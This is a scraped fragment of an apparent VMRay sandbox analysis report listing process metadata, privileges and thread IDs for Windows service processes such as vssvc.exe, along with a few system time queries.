Information Value
PID 0xae8
Parent PID 0x254 (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AEC
0x AF0
0x AF4
0x AF8
0x AFC
0x B00
0x B04
Process #6: vssvc.exe
3 0
»
Information Value
ID #6
File Name c:\windows\system32\vssvc.exe
Command Line C:\Windows\system32\vssvc.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:11, Reason: RPC Server
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:04
OS Process Information
»
Information Value
PID 0xb08
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B20
0x B1C
0x B18
0x B14
0x B10
0x B0C
0x B28
0x B44
Host Behavior
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-06-01 18:41:02 (UTC) True 1
Fn
Get Time type = Ticks, time = 132632 True 1
Fn
Get Time type = Performance Ctr, time = 19328746087 True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image